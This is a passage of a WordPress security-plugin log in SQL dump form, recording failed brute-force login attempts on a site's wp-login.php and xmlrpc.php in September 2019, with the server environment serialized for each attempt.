13:41:13',17741560,19232616,'https://bintara.com.my/wp-login.php',1,0,'103.221.221.133'),(25071,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"97.74.232.21\";s:11:\"REMOTE_PORT\";s:5:\"41442\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYIyLcrWzCkhZpjT3iOZdwAAAUQ\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568813613.8074\";s:12:\"REQUEST_TIME\";s:10:\"1568813613\";}}','notice','2019-09-18 13:33:35','2019-09-18 13:33:34',18258648,19555224,'https://bintara.com.my/xmlrpc.php',1,0,'97.74.232.21'),(25070,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"93\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"97.74.232.21\";s:11:\"REMOTE_PORT\";s:5:\"40686\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYIyKsrWzCkhZpjT3iOZcgAAAVA\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568813610.9928\";s:12:\"REQUEST_TIME\";s:10:\"1568813610\";}}','notice','2019-09-18 13:33:32','2019-09-18 13:33:31',17740824,19231656,'https://bintara.com.my/wp-login.php',1,0,'97.74.232.21'),(25069,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"142.44.163.100\";s:11:\"REMOTE_PORT\";s:5:\"58008\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYIujW4SfF9g@8lNlxxWwAAAAEY\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568812685.4299\";s:12:\"REQUEST_TIME\";s:10:\"1568812685\";}}','notice','2019-09-18 13:18:06','2019-09-18 13:18:05',18259040,19556344,'https://bintara.com.my/xmlrpc.php',1,0,'142.44.163.100'),(25068,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"92\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"142.44.163.100\";s:11:\"REMOTE_PORT\";s:5:\"57198\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYIuicrWzCkhZpjT3iOVCgAAAUM\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1568812681.965\";s:12:\"REQUEST_TIME\";s:10:\"1568812681\";}}','notice','2019-09-18 13:18:03','2019-09-18 13:18:02',17741104,19231296,'https://bintara.com.my/wp-login.php',1,0,'142.44.163.100'),(25067,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"169.61.210.246\";s:11:\"REMOTE_PORT\";s:5:\"54571\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYIrBsrWzCkhZpjT3iORUwAAAUE\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568811782.2634\";s:12:\"REQUEST_TIME\";s:10:\"1568811782\";}}','notice','2019-09-18 13:03:04','2019-09-18 13:03:02',18259048,19556344,'https://bintara.com.my/xmlrpc.php',1,0,'169.61.210.246'),(25066,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"90\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"169.61.210.246\";s:11:\"REMOTE_PORT\";s:5:\"36221\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYIrAiR0vdvYEIduPCLz4QAAAQE\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568811778.7925\";s:12:\"REQUEST_TIME\";s:10:\"1568811778\";}}','notice','2019-09-18 13:03:00','2019-09-18 13:02:59',17741840,19233512,'https://bintara.com.my/wp-login.php',1,0,'169.61.210.246'),(25065,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:11:\"2.82.143.65\";s:11:\"REMOTE_PORT\";s:5:\"54425\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYIpa24SfF9g@8lNlxxUVwAAAEg\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568811371.4472\";s:12:\"REQUEST_TIME\";s:10:\"1568811371\";}}','notice','2019-09-18 12:56:12','2019-09-18 12:56:11',18262936,19559080,'https://bintara.com.my/xmlrpc.php',1,0,'2.82.143.65'),(25038,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"188.166.239.113\";s:11:\"REMOTE_PORT\";s:5:\"12547\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYIPi8rWzCkhZpjT3iN22QAAAUc\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568804747.8445\";s:12:\"REQUEST_TIME\";s:10:\"1568804747\";}}','notice','2019-09-18 11:05:52','2019-09-18 11:05:50',18256584,19553912,'https://bintara.com.my/xmlrpc.php',1,0,'188.166.239.113'),(25039,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"90\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:11:\"23.83.230.2\";s:11:\"REMOTE_PORT\";s:5:\"35940\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYIRjcrWzCkhZpjT3iN4bwAAAUs\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568805268.5734\";s:12:\"REQUEST_TIME\";s:10:\"1568805268\";}}','notice','2019-09-18 11:14:33','2019-09-18 